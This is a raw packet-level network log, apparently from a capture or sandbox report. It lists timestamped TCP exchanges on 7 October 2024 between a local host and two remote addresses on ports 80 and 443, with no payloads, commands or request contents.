Oct 7, 2024 03:15:41.411582947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411604881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411614895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411638021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411648989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411670923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411683083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411705017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411739111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411739111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411756992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411772966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411787987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411808968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411843061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411854029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411878109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411890984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411911011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411925077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411945105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411957026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.411977053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.411988020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412010908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412022114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412044048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412055016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412079096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412089109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412111998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412122965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412147045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412156105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412179947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412189960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412215948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412224054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412249088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412264109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412285089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412295103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412317991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412343979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412352085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412360907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412386894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412395954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412421942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412431002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412455082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412467003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412487984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412498951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412522078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412532091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412555933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412565947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412590027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412599087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412622929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412632942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412656069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412668943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412693024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412703037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412725925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412738085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412760973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412770033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412794113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412808895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412827969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412837029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412859917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412890911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412894964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412903070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412928104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412942886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.412964106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.412975073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.413016081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.450974941 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.451997042 CEST	49843	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.452060938 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.452716112 CEST	49843	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.452730894 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.466864109 CEST	443	49844	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.467520952 CEST	49844	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.467550039 CEST	443	49844	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.468007088 CEST	49844	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.468013048 CEST	443	49844	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.519635916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.519712925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.519854069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.519853115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.519882917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.519905090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.519907951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.519959927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.519969940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.519994974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520018101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520031929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520060062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520087004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520097017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520121098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520180941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520179987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520234108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520250082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520268917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520301104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520302057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520320892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520355940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520370007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520389080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520416975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520422935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520443916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520457029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520488977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520503998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520510912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520570040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520625114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520627022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520677090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520678043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520725965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520734072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520778894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520780087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520829916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520831108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520864010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520880938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520899057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520916939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520950079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.520950079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.520983934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521002054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521015882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521037102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521051884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521069050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521101952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521107912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521148920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521167040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521183014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521204948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521219969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521236897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521271944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521272898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521306992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521323919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521346092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521361113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521379948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521395922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521415949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521435022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521450043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521469116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521485090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521505117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521538019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521547079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521601915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521605968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521656036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521662951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521708965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521709919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521745920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521763086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521780014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521800041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521812916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521833897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521867037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521872997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521917105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521920919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521949053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.521971941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.521981955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522005081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522017002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522037029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522053003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522070885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522087097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522119999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522120953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522155046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522156000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522190094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522190094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522202015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522223949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522243977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522258043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522279978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522291899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522310972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522325993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522346973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522360086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522378922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522393942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522412062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522429943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522449017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522463083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522484064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522496939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522511959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522530079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522551060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522562981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522583008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522603989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522613049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522638083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522654057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522670031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522689104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522705078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522728920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522737026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522769928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522787094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522819996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522851944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522885084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522892952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522917032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522952080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.522954941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522984028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.522986889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523019075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523021936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523041010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523057938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523082018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523092031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523123026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523127079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523144960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523159027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523190022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523195982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523212910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523228884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523262978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523283005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523298979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523320913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523332119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523355961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523366928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523396969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523422956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523458004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523483992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523488998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523507118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523518085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523540974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523551941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523578882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523601055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523611069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523639917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523644924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523677111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523682117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523700953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523711920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523745060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523758888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523777008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523809910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523844004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523875952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523910999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523937941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.523942947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.523976088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.524008036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.524041891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.524070024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.524075985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.524107933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.524110079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.524132013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.524142981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.524169922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.524184942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.524204016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.524245024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.536917925 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.537497997 CEST	49845	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.537542105 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.538129091 CEST	49845	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.538147926 CEST	443	49845	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.553411961 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.553839922 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.553910971 CEST	49843	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.554079056 CEST	49843	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.554079056 CEST	49843	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.554097891 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.554106951 CEST	443	49843	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.558460951 CEST	49848	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.558507919 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.558592081 CEST	49848	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.558768988 CEST	49848	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.558785915 CEST	443	49848	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.565654039 CEST	443	49844	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.565738916 CEST	443	49844	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.565808058 CEST	49844	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.565958023 CEST	49844	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.565978050 CEST	443	49844	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.565989017 CEST	49844	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.565994978 CEST	443	49844	13.107.246.45	192.168.2.5
